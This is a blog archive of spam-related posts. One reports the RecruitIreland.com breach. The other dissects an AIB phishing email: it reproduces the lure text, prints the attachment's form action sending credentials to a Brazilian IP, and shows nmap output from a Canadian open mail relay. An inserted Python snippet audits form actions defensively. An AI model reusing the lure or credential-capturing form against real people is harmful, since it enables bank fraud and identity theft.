Tag Archive | "spam"

Recruit Ireland Website Hacked




Yesterday, the 8th of February, the RecruitIreland.com website was compromised. It is believed spammers gained access to the database and compromised names and email addresses for the purposes of spamming.

The website is currently offline as it has not yet been determined how the attack happened. It is believed to be under investigation, but in cases like this it is usually down to poor coding.

It is not yet known when the website will come back online.

If you are signed up with RecruitIreland.com you may receive emails similar to the one below, which should be ignored. You may also want to think about changing your email password as, like many, you may have used the same password for your email as you did on recruitireland.com.


The origin of an AIB Phishing Scam




Once again a spam e-mail message arrives in the inbox. On the surface it appears fairly ordinary. It’s an advertisement for Viagra or some cheap Chinese knock-off watches, written in poor English, trying to entice me to click through to some website. From time to time I like to investigate further how this message ended up being sent to my address.

A couple of weeks ago I received an email supposedly from Allied Irish Banks (alert@aib.ie).


Here is a copy of the email I received:

Dear AIB Online User,

We regret to inform you that access to your online account has been locked.

This happened because of too many failed log-in attempts.

To restore your online account access you can:

1. Visit your local branch and complete the Unlock My Account form (takes several days)

2. Complete the Unlock My Account form online, by downloading and completing the attached form (instant)

Quality service and the security of your account are of great importance to us.

We appreciate each opportunity to serve you.

Sincerely,

Customer Service

Attached to this email was an HTML document containing a form that requested my credentials and each of the one hundred 4-digit codes from my code card. At the top of the form the AIB logo was evident, and familiar buttons exactly the same as those that appear on the AIB website were included at the bottom, as can be seen in the screenshot below.

Taking a look at the source of this form it could be seen that upon entering the details the information would not be sent to AIB but to some other address:

<form action="http://189.8.16.6/appserv/form1.php" method="post"
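The check described above can be automated for HTML attachments. The following is an added example, not code from the original post: it lists every form whose action submits somewhere other than the brand's own domain. The function names, the trusted-domain parameter and the sample markup are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_form_actions(html, trusted_domain):
    """Return (action, reasons) for each form that posts to an untrusted host."""
    collector = FormActionCollector()
    collector.feed(html)
    findings = []
    for action in collector.actions:
        url = urlparse(action)
        host = (url.hostname or "").lower()
        if not host:
            continue  # relative action: no remote host to judge
        reasons = []
        if is_ip_literal(host):
            reasons.append("posts to a bare IP address")
        elif host != trusted_domain and not host.endswith("." + trusted_domain):
            reasons.append("host is outside " + trusted_domain)
        if url.scheme != "https":
            reasons.append("credentials sent without TLS")
        if reasons:
            findings.append((action, reasons))
    return findings

# Constructed sample modelled on the attachment described in the post.
SAMPLE = '''<html><body><img src="logo.gif">
<form action="http://189.8.16.6/appserv/form1.php" method="post">
<input name="field1"><input type="submit"></form></body></html>'''

if __name__ == "__main__":
    for action, reasons in audit_form_actions(SAMPLE, "aib.ie"):
        print(action, "->", "; ".join(reasons))
```

The suffix comparison requires a leading dot, so look-alike hosts that merely contain the trusted name are still reported.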


Having a closer look at the IP address 189.8.16.6, it turns out that this does not belong to AIB but in fact points to a Unitelco broadband customer in Brazil. What in heavens would he want all my AIB details for? I then emailed the abuse department of Unitelco informing them that one of their customers' connections is involved in a phishing scam. To date I have not received a response.

Getting to the end of my investigation, or so I thought, I then decided to have a look at the headers of the email and see exactly where that came from.

Received: from toroonXXxXxxX3.sdsl.bell.ca (HELO XXXX.net) ([69.XX.203.XX])

It turned out that this IP address belonged to a marketing company in Canada.

An nmap of the IP revealed the following:

PORT     STATE  SERVICE
25/tcp   open   smtp
80/tcp   open   http
143/tcp  open   imap
443/tcp  open   https
993/tcp  open   imaps
1723/tcp open   pptp
3389/tcp open   ms-term-serv
8080/tcp open   http-proxy

I promptly contacted the company to let them know that not only are they running an open mail relay on Exchange (allowing anyone on the Internet to send e-mail through their server) but they also appear to have a default install of Windows 2003 Server (not a very good idea). To date this appears still not to have been remedied.

So it turned out that the spam email was sent through a poorly secured server in Canada, and in the event of it finding someone susceptible enough to actually fill in the details, this information would be sent to a computer in Brazil. Luckily I didn’t fall for this one and my account balance has remained intact... for now.

